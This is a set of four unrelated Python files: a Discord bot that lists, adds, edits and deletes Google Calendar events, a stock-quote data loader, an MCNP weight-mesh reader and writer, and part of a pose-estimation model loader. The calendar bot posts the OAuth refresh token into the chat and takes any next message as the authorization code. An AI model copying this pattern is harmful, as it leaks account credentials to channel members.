flow = OAuth2WebServerFlow(client_id=GOOGLE_CLIENT_ID,
client_secret=GOOGLE_CLIENT_SECRET,
scope='https://www.googleapis.com/auth/calendar',
redirect_uri='http://id.heroku.com/oauth/authorize',
prompt='consent')
flow.user_agent = 'calendar-stff'
authorize_url = flow.step1_get_authorize_url()
# change this to give an error message and dm caleb instead
await ctx.send(authorize_url)
message = await client.wait_for('message')
code = message.content
credentials = flow.step2_exchange(code)
# with open('refresh.token', 'w+') as f:
# f.write(credentials.refresh_token)
await ctx.send(credentials.refresh_token)
#credentials = tools.run_flow(flow, store)
# print('Storing credentials to ' + credential_path)
return credentials
def convert_time(str_time):
date_time = str_time.split('T')
mil_time = date_time[1].split('-')[0]
time = datetime.datetime.strptime(mil_time, '%H:%M:%S').strftime('%I:%M %p')
if time.startswith('0'):
time = time[1:]
return date_time[0], time
async def get_events(ctx, client, is_today):
"""Shows basic usage of the Google Calendar API.
Prints the start and name of the next 10 events on the user's calendar.
"""
CREDS = await get_credentials(ctx, client)
service = build('calendar', 'v3', credentials=CREDS)
# Call the Calendar API
now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time
# print(service.calendarList().list(pageToken=None).execute())
if is_today:
date = datetime.date.today().strftime('%Y-%m-%d')
events_result = service.events().list(calendarId=UMARL_CALENDAR_ID, timeMin=now,
maxResults=15, singleEvents=True,
orderBy='startTime', timeMax=date + 'T23:59:59' + TIME_ZONE_STR).execute()
else:
events_result = service.events().list(calendarId=UMARL_CALENDAR_ID, timeMin=now,
maxResults=15, singleEvents=True,
orderBy='startTime').execute()
events = events_result.get('items', [])
#print(events)
if not events:
calendar_output_embed = discord.Embed(
title=events_result['summary'],
description='No upcoming events!',
color=discord.Color.red())
else:
calendar_output_embed = discord.Embed(
title=events[0]['organizer'].get('displayName'),
color=discord.Color.dark_teal())
for event in events:
start = event['start'].get('dateTime', event['start'].get('date'))
time = convert_time(start)
date = time[0].split('-')
date_time_date= datetime.date(int(date[0]), int(date[1]), int(date[2]))
month = date_time_date.strftime('%b')
day = date_time_date.weekday()
day_str = WEEKDAYS[day]
title = ''
calendar_event_link = '[Calendar Event Link](' + event['htmlLink'] + ')'
event_desc = time[1] + ' ' + day_str + ' ' + month + ' ' + date[2] + ' ' + date[0] + '\n' + calendar_event_link
if 'description' in event and '<a href=' in event['description'].strip():
# print(event['description'])
soup = bs4.BeautifulSoup(event['description'])
aTags = soup.find_all("a")
urls = [tag['href'] for tag in aTags if 'href' in tag.attrs]
te_link = '[Tournament Event Link](' + urls[0] + ')' # tournament link needs to be the first url
event_desc += '\n' + te_link
calendar_output_embed.add_field(name=event['summary'], value= event_desc, inline=False)
await ctx.send(embed=calendar_output_embed)
async def set_time(ctx, starttime_arg):
if not (starttime_arg.endswith('pm') or starttime_arg.endswith('am')):
await ctx.send(embed=discord.Embed(
description="Invalid time format. Please end with 'am' or 'pm'! ex. 12:00 pm",
color=discord.Color.red()))
return ''
time_value = starttime_arg[:-2].rstrip() # trim off 'pm' or 'am'
hours_min = time_value.split(':')
if len(hours_min) != 2:
await ctx.send(embed=discord.Embed(
description="Invalid time format. Please use ex. 12:00 pm",
color=discord.Color.red()))
return ''
hours = int(hours_min[0])
minutes = int(hours_min[1])
if starttime_arg.endswith('pm'):
hours += 12
if hours > 23 or minutes > 59 or hours < 0 or minutes < 0:
await ctx.send(embed=discord.Embed(description="Invalid time!", color=discord.Color.red()))
return ''
if hours < 10:
hours_str = '0' + str(hours)
else:
hours_str = str(hours)
if minutes < 10:
minutes_str = '0' + str(minutes)
else:
minutes_str = str(minutes)
return hours_str + ':' + minutes_str + ':00' + TIME_ZONE_STR
async def check_and_format_date(ctx, date_arg):
if re.match(r"\d{4}-\b(0?[1-9]|[1][0-2])\b-\b(0?[1-9]|[12][0-9]|3[01])\b", date_arg): #1999-01-25 (year- month - day)
date_arr = date_arg.split('-')
try:
temp_date = datetime.datetime(int(date_arr[0]), int(date_arr[1]), int(date_arr[2]))
except ValueError:
await ctx.send(embed=discord.Embed(
description="Invalid date! Please use a real date.",
color=discord.Color.red()))
return ''
if len(date_arr[1]) < 2:
date_arg = date_arg[:5] + '0' + date_arg[5:]
if len(date_arr[2]) < 2:
date_arg = date_arg[:8] + '0' + date_arg[8:]
else:
await ctx.send(embed=discord.Embed(
description="Invalid date! Please use a date in this format: year-month-day.\n" \
"ex. 2020-5-20",
color=discord.Color.red()))
return ''
return date_arg
async def set_end_time(ctx, duration, start_time):
start_datetime = dtparse(start_time)
end_datetime = start_datetime + datetime.timedelta(minutes=int(duration))
end = end_datetime.strftime("%Y-%m-%dT%H:%M:%S")
return end + TIME_ZONE_STR
async def add_events(ctx, client, args):
CREDS = await get_credentials(ctx, client)
service = build('calendar', 'v3', credentials=CREDS)
date_arg = args[0].strip()
starttime_arg = args[1].strip().lower()
duration = args[2].strip()
if int(duration) < 15 or int(duration) > 1440:
await ctx.send(embed=discord.Embed(
description="Invalid duration, please input a duration (in minutes) between 15 and 1440.",
color=discord.Color.red()))
return
summary = args[3].strip()
if len(args) > 4:
link = args[4].strip()
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
if not re.match(regex, link):
await ctx.send(embed=discord.Embed(
description="Invalid value used for link parameter.",
color=discord.Color.red()))
return
else:
link = ''
date_str = await check_and_format_date(ctx, date_arg)
if len(date_str) < 1:
return
start_time = await set_time(ctx, starttime_arg)
if len(start_time) < 1:
return
end_time = await set_end_time(ctx, duration, date_str + 'T' + start_time)
# to make all day events use 'date' field instead of 'dateTime' field and just use date (ex. 2020-05-20)
new_event = {
'summary': summary,
'description': '<a href=\"' + link + '\">' + link + '</a> ',
'start': {
'dateTime': date_str + 'T' + start_time,
'timeZone': 'America/New_York'
},
'end': {
'dateTime': end_time,
'timeZone': 'America/New_York'
}
}
event = service.events().insert(calendarId=UMARL_CALENDAR_ID, body=new_event).execute()
await ctx.send(embed=discord.Embed(
description="Event created with name:\n" + summary,
color=discord.Color.green()))
def retrieve_event_id(name, events):
"""
Gets the event id by searching the events for an event matching the name passed in.
Returns the event id and the event name with the correct capitalization.
"""
event_id = ''
event_name = ''
for event in events:
if event['summary'].lower() == name.lower():
event_id = event['id']
event_name = event['summary']
return event_id, event_name
def retrieve_all_events(service, calendar_id):
"""
Gets events from the calendar with the matching calendar id
"""
# Call the Calendar API
now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time
events_result = service.events().list(calendarId=calendar_id, timeMin=now,
singleEvents=True, orderBy='startTime').execute()
return events_result.get('items', [])
async def delete_event(ctx, client, contents):
CREDS = await get_credentials(ctx, client)
service = build('calendar', 'v3', credentials=CREDS)
events = retrieve_all_events(service, UMARL_CALENDAR_ID)
if not events:
await ctx.send(embed=discord.Embed(
description='No events exist on the calendar.',
color=discord.Color.red()))
return
event_id, event_name = retrieve_event_id(contents, events)
if len(event_id) > 0:
service.events().delete(calendarId=UMARL_CALENDAR_ID, eventId=event_id).execute()
await ctx.send(embed=discord.Embed(
description='Event with name: \"' + event_name + '\" has been successfully deleted',
color=discord.Color.green()))
else:
await ctx.send(embed=discord.Embed(
description='No event exists with name:\n' + contents,
color=discord.Color.red()))
async def edit_event_time(ctx, client, args):
CREDS = await get_credentials(ctx, client)
service = build('calendar', 'v3', credentials=CREDS)
summary = args[0].strip()
starttime_arg = args[1].strip().lower()
start_time = await set_time(ctx, starttime_arg)
if len(start_time) < 1:
return
events = retrieve_all_events(service, UMARL_CALENDAR_ID)
if not events:
await ctx.send(embed=discord.Embed(
description='No events exist on the calendar.',
color=discord.Color.red()))
return
event_id, event_name = retrieve_event_id(summary, events)
event = service.events().get(calendarId=UMARL_CALENDAR_ID, eventId=event_id).execute()
if len(args) > 2:
date_arg = args[2].strip()
date_str = await check_and_format_date(ctx, date_arg)
if len(date_str) < 1:
return
else:
date_str = event['start']['dateTime'].split('T')[0]
if len(args) > 3:
duration = args[3].strip()
if int(duration) < 15 or int(duration) > 1440:
await ctx.send(embed=discord.Embed(
description="Invalid duration, please input a duration (in minutes) between 15 and 1440.",
color=discord.Color.red()))
return
else:
start_datetime = dtparse(event['start']['dateTime'])
end_datetime = dtparse(event['end']['dateTime'])
minutes_difference_timedelta = end_datetime - start_datetime
duration = int(minutes_difference_timedelta.seconds / 60)
event['start']['dateTime'] = date_str + 'T' + start_time
event['end']['dateTime'] = await set_end_time(ctx, duration, date_str + 'T' + start_time)
updated_event = service.events().update(calendarId=UMARL_CALENDAR_ID, eventId=event_id, body=event).execute()
await ctx.send(embed=discord.Embed(description="Event time updated!", color=discord.Color.green()))
|
from datetime import date, datetime, timedelta
from itertools import count
import numpy as np
import os
import pandas as pd
import psutil
# countPerDay = 85 # one quote data every 5 minutes, total it is 85 quotes per day per symbol
countPerDay = 29 # as it is resampled every 15 minutes, the countPerDay was changed from 85 to 29
symbolCount = 123
signalCount = 12
defaultDatePattern = '%Y%m%d'
quotesOnedayPath = "data/quotes_oneday_data"
targetSymbolIndex = 99 # target symbol is TECL, its index is 99 (starting from 0) in the dataframe for the same time
minuteFilterArray = [0, 15, 30, 45] # every 15 minutes
# minuteFilterArray = [0, 10, 20, 30, 40, 50] # every 10 minutes
def getMemoryUsed():
return int(psutil.virtual_memory()[3] / 1024 /1024)
def getFile(day):
filename = 'data_' + datetime.strftime(day.to_timestamp(), defaultDatePattern) + ".csv"
return os.path.join(quotesOnedayPath, filename)
def minuteFilter(row):
currentTime = datetime.strptime(row['currentTime'], "%Y-%m-%d %H:%M:%S")
return currentTime.minute in minuteFilterArray
"""
- dropColumns shall be True, False is for testing purpose
"""
def readToDataFrame(startDate, endDate):
periodRange = pd.period_range(start=startDate, end=endDate, freq='D')
result = []
for day in periodRange:
file = getFile(day)
if os.path.isfile(file):
# print(f'read file for {day}')
df = pd.read_csv(file)
df = df[df.apply(minuteFilter, axis=1)]
result.append(df)
return pd.concat(result)
# tick starts from 0
def getArray(df, tick):
subDataFrame = getSubDataFrame(df, tick)
# convert symbol to int or drop symbol?
# convert date to int
subDataFrame = subDataFrame.drop(columns=['symbol', 'currentTime'])
# convert to np array
data = []
for i in range(countPerDay):
startIndex = i * symbolCount
endIndex = (i+1) * symbolCount
if startIndex >= len(subDataFrame):
return None
data.append(subDataFrame[startIndex : endIndex].to_numpy().tolist())
return data
"""
tick starts from 0
"""
def getSubDataFrame(df, tick):
startIndex = tick * symbolCount
endIndex = startIndex + countPerDay * symbolCount
return df[startIndex:endIndex]
def printSample(data):
print('data shape: ', np.array(data).shape)
print(data[0][0][0], data[0][0][1])
print(data[0][122][0], data[0][122][1])
print(data[countPerDay-1][0][0], data[countPerDay-1][0][1])
print(data[countPerDay-1][122][0], data[countPerDay-1][122][1])
if __name__ == '__main__':
startDate, endDate = '20210831', '20210901'
memoryBefore = getMemoryUsed()
df = readToDataFrame(startDate, endDate)
print(len(df))
memoryAfter = getMemoryUsed()
print(f'memory used {memoryAfter - memoryBefore}M')
data = getArray(df, 0)
printSample(data)
# assert data[0][99][0] == 'TECL'
data = getArray(df, 1)
printSample(data)
# assert data[0][99][0] == 'TECL'
print(type(data))
print(type(data[0]))
print(type(data[0][0]))
print(type(data[0][0][0]))
assert getArray(df, 100) is None
|
<reponame>MC-kit/mckit-meshes
from typing import Any, Generator, List, NamedTuple, Optional, TextIO, Tuple, Union
import sys
from dataclasses import dataclass
from enum import IntEnum
import mckit_meshes.mesh.geometry_spec as gs
import mckit_meshes.utils as ut
import numpy as np
GeometrySpec = Union[gs.CartesianGeometrySpec, gs.CylinderGeometrySpec]
Point = np.ndarray
def ensure_float_arrays(*arrays: Any) -> Generator[np.ndarray, None, None]:
yield from map(lambda x: np.asarray(x, dtype=float), arrays)
class Particles(IntEnum):
neutron = 0
photon = 1
n = 0
p = 1
# noinspection GrazieInspection
class WgtMesh:
"""
Class to work with MCNP weight window files.
"""
def __init__(
self,
geometry_spec: GeometrySpec,
energies,
weights,
):
self._energies: List[np.ndarray] = list(ensure_float_arrays(*energies))
self._geometry_spec = geometry_spec
self._weights: List[np.ndarray] = list(ensure_float_arrays(*weights))
self.validate()
def print_mcnp_generator_spec(self, io=None, ref="600 0 50", columns: int = 6):
if io is None:
io = sys.stdout
print(f"mesh ref={ref}", file=io)
self._geometry_spec.print(io, columns=columns)
print("wwge:n", end=" ", file=io)
second_indent = " " * 15
ut.print_n(
gs.format_floats(self.energies[0][1:]),
io=io,
indent=second_indent,
columns=columns,
)
if len(self.energies) > 1:
print("wwge:p", end=" ", file=io)
ut.print_n(
gs.format_floats(self.energies[1][1:]),
io=io,
indent=second_indent,
columns=columns,
)
def print_meshtal_spec(
self,
io: TextIO = None,
tally_n_number: int = 14,
tally_p_number: int = 24,
columns: int = 6,
) -> None:
if io is None:
io = sys.stdout
print(f"fc{tally_n_number} === WW generation mesh for neutrons", file=io)
print(f"fmesh{tally_n_number}:n", file=io)
self._geometry_spec.print(io, columns=columns)
indent = " " * 8
print(indent, "emesh=", sep="", end="", file=io)
second_indent = indent + " " * 6
ut.print_n(
gs.format_floats(self.energies[0][1:]),
io=io,
indent=second_indent,
columns=columns,
)
if len(self.energies) > 1:
print(f"fc{tally_p_number} === WW generation mesh for photons", file=io)
print(f"fmesh{tally_p_number}:p", file=io)
self._geometry_spec.print(io, columns=columns)
print(indent, "emesh=", sep="", end="", file=io)
# TODO dvp: try to use do_print_bins here
ut.print_n(
gs.format_floats(self.energies[1][1:]),
io=io,
indent=second_indent,
columns=columns,
)
def validate(self):
if len(self.weights) != len(self.energies):
raise ValueError(
f"Number of energy bins {len(self.energies)} is not equal to number of weight parts {len(self.weights)}"
)
for part, ebins in enumerate(self.energies):
expected_shape = tuple(
[
ebins.size - 1,
self.ibins.size - 1,
self.jbins.size - 1,
self.kbins.size - 1,
]
)
if self.weights[part].shape != expected_shape:
raise ValueError(
f"Incompatible number of ebins, voxels and weights: {self.weights[part].shape} != {expected_shape}"
)
@property
def energies(self):
return self._energies
@property
def origin(self):
return self._geometry_spec.origin
@property
def ibins(self):
return self._geometry_spec.ibins
@property
def jbins(self):
return self._geometry_spec.jbins
@property
def kbins(self):
return self._geometry_spec.kbins
@property
def count_voxels(self):
return (self.ibins.size - 1) * (self.jbins.size - 1) * (self.kbins.size - 1)
@property
def weights(self) -> List[np.ndarray]:
return self._weights
@property
def neutron_weights(self) -> np.ndarray:
return self._weights[0]
@property
def photon_weights(self) -> np.ndarray:
assert len(self._weights) == 2, "Photon weights are not defined in the mesh"
return self._weights[1]
@property
def is_cylinder(self) -> bool:
return self._geometry_spec.cylinder
@property
def axs(self) -> Optional[np.ndarray]:
return self._geometry_spec.axs
@property
def vec(self) -> Optional[np.ndarray]:
return self._geometry_spec.vec
@property
def count_parts(self) -> int:
return len(self.weights)
def part(self, particle: Particles) -> Tuple[np.ndarray, np.ndarray]:
return self.energies[particle], self.weights[particle]
def __hash__(self):
return hash(
(
self._geometry_spec.__hash__(),
self.energies,
self.weights,
)
)
def __eq__(self, other):
if not self.bins_are_equal(other):
return False
for p in range(len(self.weights)):
if not np.array_equal(self.weights[p], other.weights[p]):
return False
return True
def bins_are_equal(self, other: "WgtMesh") -> bool:
if not isinstance(other, WgtMesh):
raise RuntimeError(
"Invalid class of object to compare: {}", other.__class__
)
if self._geometry_spec == other._geometry_spec:
le = len(self.energies)
if le == len(other.energies):
for i in range(le):
if not np.array_equal(self.energies[i], other.energies[i]):
return False
return True
return False
def __add__(self, other: "WgtMesh") -> "WgtMesh":
assert self.bins_are_equal(other)
weights = list(a + b for a, b in zip(self.weights, other.weights))
res = WgtMesh(
self._geometry_spec,
self.energies,
weights,
)
return res
def __sub__(self, other: "WgtMesh") -> "WgtMesh":
assert self.bins_are_equal(other)
weights = list(a - b for a, b in zip(self.weights, other.weights))
res = WgtMesh(
self._geometry_spec,
self.energies,
weights,
)
return res
def __mul__(self, coeff: float) -> "WgtMesh":
weights = list(w * coeff for w in self.weights)
res = WgtMesh(
self._geometry_spec,
self.energies,
weights,
)
return res
def __rmul__(self, coeff: float) -> "WgtMesh":
return self.__mul__(coeff)
# def __repr__(self):
# return f"WgtMesh({tuple(self.origin)}, {self.energies})"
# noinspection SpellCheckingInspection
def write(self, stream: TextIO) -> None:
"""Writes the mesh to stream.
See WWINP format, MCNP User Manual, Appendix J, Table J.1
Args;
stream: a stream to write to
"""
data = []
_if, _iv, _ni = 1, 1, len(self.energies)
if self.is_cylinder:
_nr = 16
else:
_nr = 10
data += produce_strings([_if, _iv, _ni, _nr], "{0:10d}")
# remove the first "\n"
data = data[1:]
_ne = [x.size - 1 for x in self._energies]
data += produce_strings(_ne, "{0:10d}")
_nfx = self.ibins.size - 1
_nfy = self.jbins.size - 1
_nfz = self.kbins.size - 1
_x0, _y0, _z0 = self.origin
_nfmx, _xm = gs.compute_intervals_and_coarse_bins(self.ibins)
_ncx = len(_nfmx)
_nfmy, _ym = gs.compute_intervals_and_coarse_bins(self.jbins)
_ncy = len(_nfmy)
_nfmz, _zm = gs.compute_intervals_and_coarse_bins(self.kbins)
_ncz = len(_nfmz)
_nwg = 1
_data = [_nfx, _nfy, _nfz, _x0, _y0, _z0, _ncx, _ncy, _ncz]
if self.is_cylinder:
if self.axs is None:
raise ValueError("axs is not specified in cylinder mesh")
_xmax, _ymax, _zmax = self.axs
if self.vec is None:
raise ValueError("vec is not specified in cylinder mesh")
_xr, _yr, _zr = self.vec
_data += [_xmax, _ymax, _zmax, _xr, _yr, _zr]
_nwg = 2
_data += [_nwg]
data += produce_strings(_data, "{0:#13.5g}")
# Block 2
_nc = [_ncx, _ncy, _ncz]
_nfm = [_nfmx, _nfmy, _nfmz]
_r = [_xm, _ym, _zm]
for i in range(3):
data1 = [_r[i][0]]
for j in range(_nc[i]):
data1 += [_nfm[i][j], _r[i][j + 1], 1]
data += produce_strings(data1, "{0:#13.5g}")
for p in range(_ni):
data += produce_strings(
self.energies[p][1:], "{0:#13.5g}"
) # omit the first zero
data1 = []
# TODO dvp: order of cycling and dimensions are not efficient:
# the index changing faster should be the most inner in cycle.
for e in range(_ne[p]):
for k in range(_nfz):
for j in range(_nfy):
for i in range(_nfx):
data1.append(self._weights[p][e, i, j, k])
data += produce_strings(data1, "{0:#13.5g}")
stream.write("".join(data))
@dataclass
class _Reader:
data: List[str]
index: int = 0
def get(self, items: int) -> List[str]:
i = self.index
self.index += items
return self.data[i : self.index]
def get_floats(self, items: int) -> Generator[float, None, None]:
return map(float, self.get(items))
def get_ints(self, items: int) -> Generator[int, None, None]:
return map(int, self.get(items))
def get_ints_written_as_floats(self, items: int) -> Generator[int, None, None]:
return map(int, self.get_floats(items))
def skip(self, items: int = 1) -> None:
self.index += items
# noinspection SpellCheckingInspection
@classmethod
def read(cls, f: TextIO) -> "WgtMesh":
"""Read an MCNP weights file.
See format description at MCNP User Manual, Version 5 (p.489 or Appendix J, p. J-1)
Args:
f: Input file in WWINP format
Returns:
WgtMesh: loaded mesh.
"""
_if, _iv, number_of_particles, number_of_parameters = (
int(s) for s in f.readline().split()[:4]
)
reader = WgtMesh._Reader(f.read().split())
sizes_of_energy_bins = tuple(reader.get_ints(number_of_particles))
# cells along axes
_nfx, _nfy, _nfz = reader.get_ints_written_as_floats(3)
# origin
_x0, _y0, _z0 = reader.get_floats(3)
# coarse bins along axes
_ncx, _ncy, _ncz = reader.get_ints_written_as_floats(3)
if number_of_parameters == 16:
_xmax, _ymax, _zmax, _xr, _yr, _zr = reader.get_floats(6)
axs = np.array([_xmax, _ymax, _zmax], dtype=float)
vec = np.array([_xr, _yr, _zr], dtype=float)
else:
axs = None
vec = None
# skip NWG
reader.skip()
delta = 3 * _ncx + 1
_x = parse_coordinates(reader.get(delta))
delta = 3 * _ncy + 1
_y = parse_coordinates(reader.get(delta))
delta = 3 * _ncz + 1
_z = parse_coordinates(reader.get(delta))
_e = []
_w = []
for p in range(number_of_particles):
nep = sizes_of_energy_bins[p]
if 0 < nep:
ebins = np.fromiter(reader.get_floats(nep), dtype=float)
ebins = np.insert(ebins, 0, 0.0)
_e.append(ebins)
_wp = np.zeros((nep, _nfx, _nfy, _nfz), dtype=float)
_wp_data = np.fromiter(reader.get_floats(_wp.size), dtype=float)
for e in range(nep):
for k in range(_nfz):
for j in range(_nfy):
for i in range(_nfx):
cell_index = i + _nfx * (j + _nfy * (k + _nfz * e))
_wp[e, i, j, k] = _wp_data[cell_index]
_w.append(_wp)
assert np.all(
np.transpose(
_wp_data.reshape((nep, _nfz, _nfy, _nfx)), (0, 3, 2, 1)
)
== _wp
)
geometry_spec = make_geometry_spec(
[_x0, _y0, _z0], _x, _y, _z, axs=axs, vec=vec
)
return cls(geometry_spec, _e, _w)
def get_mean_square_distance_weights(self, point):
w = self._geometry_spec.get_mean_square_distance_weights(point)
_w = []
for _e in self.energies:
le = len(_e)
t = w.reshape((1,) + self._geometry_spec.bins_shape)
t = np.repeat(t, le, axis=0)
_w.append(t)
return WgtMesh(
self._geometry_spec,
self.energies,
_w,
)
class MergeSpec(NamedTuple):
wm: "WgtMesh"
nps: int
@classmethod
def merge(cls, *merge_specs: Union[MergeSpec, Tuple["WgtMesh", int]]) -> MergeSpec:
r"""Combine weight meshes produced from different runs with weighting factor.
Note:
Importance of a mesh voxel `i` is $1/w_i$ and is proportional to average portion $p_i$ of
passing particle weight W to a tally for which the weight mesh is computed.
To obtain combined weight on merging two meshes, we will combine the probabilities using weighting factors and
use reciprocal of a result as a resulting weight of mesh voxel.
The weighting factors are usually NPS (Number particles sampled) from a run on which a mesh was produced.
The combined probability in resulting voxel `i` is:
.. math::
w_ij - weight in voxel i of mesh j
n_j - nps - weighting factor on combining of mesh j
p_ij = 1/w_ij - probability for voxel i of mesh j
p_i = \frac{ \sum_j{n_j*p_ij} { \sum_j{n_j} }
So, the resulting voxel `i` weight level is:
.. math::
w_i = \frac{1} {p_i}
Args:
merge_specs: iterable of pairs (WgtMesh, nps), where `nps` is weighting factor
Returns:
MergeSpec: merged weights and total nps (or sum of weighting factors)
"""
first = merge_specs[0]
if not isinstance(first, WgtMesh.MergeSpec):
first = WgtMesh.MergeSpec(*first) # convert tuple to MergeSpec
if len(merge_specs) > 1:
second = WgtMesh.merge(*merge_specs[1:])
merged_weights = []
assert first.wm.bins_are_equal(second.wm)
for i, weights in enumerate(first.wm.weights):
nps_first, probabilities_first = prepare_probabilities_and_nps(
first.nps, weights
)
nps_second, probabilities_second = prepare_probabilities_and_nps(
second.nps, second.wm.weights[i]
)
nps = np.array(nps_first + nps_second, dtype=float)
combined_probabilities = (
nps_first * probabilities_first + nps_second * probabilities_second
) * reciprocal(nps)
merged_weights.append(reciprocal(combined_probabilities))
wm = first.wm
return WgtMesh.MergeSpec(
cls(
wm._geometry_spec,
wm.energies,
merged_weights,
),
first.nps + second.nps,
)
else:
return first
def reciprocal(self) -> "WgtMesh":
"""
Invert weights values.
To be used for anti-forward method of weight generation.
Returns
-------
out:
Reciprocal of this weights
"""
return WgtMesh(
self._geometry_spec, self.energies, list(map(reciprocal, self.weights))
)
def normalize(
self, normalization_point: Point, normalized_value: float = 1.0, energy_bin=-1
) -> "WgtMesh":
"""
Scale weights to have value `value` at `normalisation_point`.
All other voxels are scaled proportionally.
Args:
normalization_point: Coordinates of point where the weights should equal `value`.
normalized_value: The value which should be at `normalization_point`
energy_bin: index of energy bin at which set normalized value, default - the last one.
Returns:
New normalized weights.
"""
gs = self._geometry_spec
x, y, z = normalization_point
ix, iy, iz = gs.select_indexes(i_values=x, j_values=y, k_values=z)
new_weights = []
value_at_normalisation_point = self.weights[0][energy_bin, ix, iy, iz]
"""The value at last energy bin about 20 MeV at neutron weights."""
factor = normalized_value / value_at_normalisation_point
"""Scale all other weights by this value."""
for i, w in enumerate(self.weights):
# TODO dvp: revise for multiple energy bins, may be add scaling values for each energy bin and particle
value_at_normalisation_point = w[
energy_bin, ix, iy, iz
] # the last energy bin about 20 MeV.
new_weights.append(w * factor)
return WgtMesh(gs, self.energies, new_weights)
def invert(
self, normalization_point: Point, normalized_value: float = 1.0
) -> "WgtMesh":
"""Get reciprocal of self weights and normalize to 1 at given point.
Important:
A caller specifies normalization_point in local coordinates. See :class:`GeometrySpec.local_coordinates`.
Args:
normalization_point: Point at which output weights should be 1
normalized_value: value which should be set at `normalization_point`.
Returns:
WgtMesh: Normalized reciprocal of self weights.
"""
return self.reciprocal().normalize(normalization_point, normalized_value)
@property
def geometry_spec(self):
return self._geometry_spec
def drop_lower_energies(self, min_energy: float, part: int = 0) -> "WgtMesh":
if len(self.energies) <= part:
raise ValueError(f"invalid value for weights object part: {part}")
energies = self.energies[part]
energies_to_retain = min_energy <= energies
energies_to_retain[0] = True
if np.all(energies_to_retain):
return self
else:
new_energies = []
new_weights = []
for i in range(len(self.energies)):
if i == part:
new_energies.append(self.energies[i][energies_to_retain])
new_weights.append(self.weights[i][energies_to_retain[1:], :, :, :])
else:
new_energies.append(self.energies[i])
new_weights.append(self.weights[i])
gs = self._geometry_spec
return WgtMesh(gs, new_energies, new_weights)
def reciprocal(a: np.ndarray, zero_index: np.ndarray = None) -> np.ndarray:
if a.dtype != float:
a = np.array(a, dtype=float)
if zero_index is None:
zero_index = a == 0.0
else:
assert np.array_equal(zero_index, a == 0.0)
result: np.ndarray = np.reciprocal(a, where=np.logical_not(zero_index))
# fix bug in numpy reciprocal: it doesn't pass zero values, the bug doesn't show up on debugging
result[zero_index] = 0.0
return result
def prepare_probabilities_and_nps(
_nps: int, _weights: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
"""
Computes intermediate data for merging procedure.
The probabilities are reciprocals to weights.
Zero weights mean zero probabilities and don't affect the merged result.
Args:
_nps:
weighting multiplier
_weights:
weights to convert to probabilities
Returns:
normalization factors and probabilities
"""
nps_array = np.full_like(_weights, _nps, dtype=int)
zero_index = _weights == 0.0
probabilities = reciprocal(_weights, zero_index=zero_index)
nps_array[zero_index] = 0 # voxels with zero weight don't affect weighted sum
return nps_array, probabilities
def produce_strings(stream, format_spec):
data = []
for i in range(len(stream)):
if i % 6 == 0:
data.append("\n")
data.append(format_spec.format(stream[i]))
return data
def parse_coordinates(inp: List[str]) -> np.ndarray:
def iter_over_coarse_mesh():
is_first = True
i = 0
length = len(inp)
while i < length:
coordinate = float(inp[i])
if is_first:
i += 1
is_first = False
else:
i += 2
if length <= i:
yield coordinate, 1
break
else:
fine_bins = int(float(inp[i]))
i += 1
yield coordinate, fine_bins
def iter_over_fine_mesh(_iter_over_coarse_mesh):
prev_coordinate = None
prev_fine_bins = None
for coordinate, fine_bins in _iter_over_coarse_mesh:
if prev_fine_bins == 1:
yield prev_coordinate
elif prev_coordinate is not None:
res = np.linspace(
prev_coordinate,
coordinate,
prev_fine_bins + 1,
endpoint=True,
dtype=float,
)
for coord in res[:-1]:
yield coord
prev_coordinate = coordinate
prev_fine_bins = fine_bins
yield prev_coordinate
return np.fromiter(iter_over_fine_mesh(iter_over_coarse_mesh()), dtype=float)
def make_geometry_spec(origin, ibins, jbins, kbins, axs=None, vec=None) -> GeometrySpec:
origin, ibins, jbins, kbins = map(gs.as_float_array, [origin, ibins, jbins, kbins])
if axs is None:
geometry_spec = gs.CartesianGeometrySpec(ibins, jbins, kbins, origin=origin)
else:
axs, vec = map(gs.as_float_array, [axs, vec])
geometry_spec = gs.CylinderGeometrySpec(
ibins, jbins, kbins, origin=origin, axs=axs, vec=vec
)
return geometry_spec
|
import h5py;
import os;
import argparse;
import numpy as np;
import torch;
from tqdm import tqdm;
from hourglass.hg_files.test import inference;
from hourglass.hg_files import dp;
import utils.utils as ut;
import config as cf;
parts = {'mpii':['rank', 'rkne', 'rhip',
'lhip', 'lkne', 'lank',
'pelv', 'thrx', 'neck', 'head',
'rwri', 'relb', 'rsho',
'lsho', 'lelb', 'lwri']}
def load_model(hg_dir):
"""
Loads the Hourglass model from the given directory.
Parameters
----------
hg_dir : str
The full path to the hourglass directory.
Returns
-------
model : tuple
Returns two variables containing the model needed by the Hourglass
code
"""
opt = argparse.Namespace(continue_exp='pose',exp='pose',max_iters=250);
from hourglass.hg_files import pose as task;
exp_path = 'exp\\pose';
config = task.__config__
try: os.makedirs(exp_path)
except FileExistsError: pass
config['opt'] = opt;
config['data_provider'] = dp;
func = task.make_network(config)
reload(config,hg_dir);
return (func, config);
def get_kp(frame,do,c,s):
"""
Returns the keypoints for a single frame of video.
Parameters
----------
frame : numpy.ndarray
The frame of video to be analysed.
do : function
Function provided by Hourglass code for inference.
c : tuple of int
The coordinates for the centre of the image.
s : float
The scale of the image such that height/scale = 200.
Returns
-------
keypoints : numpy.ndarray
The keypoints of the frame consisting of an x, y and confidence value
for each keypoint.
"""
pred = do(frame,c,s);
kps = pred[0]["keypoints"];
return kps;
def get_kps(model, frame0, frame_gen, total):
"""
Returns the keypoints for a sequcence of video frames.
Parameters
----------
model : tuple
The model generated by the Hourglass code.
frame0 : numpy.ndarray
A sample frame from the video to ajust scale.
frame_gen : generator
A generator which provides the sequence of frames.
total : int
The total number of frames in the sequence.
Returns
-------
keypoints : list of numpy.ndarray
A list of keypoint values for each frame of the sequence.
"""
c,s = ut.calc_cent_scale(frame0);
do = get_do(model);
kpss = [get_kp(frame0,do,c,s)]
for frame in tqdm(frame_gen,initial=1,total=total):
kpss.append(get_kp(frame,do,c,s));
return kpss;
#Taken from test.py main()
def get_do(model):
"""
Gets the do function for the hourglass code to perform inference.
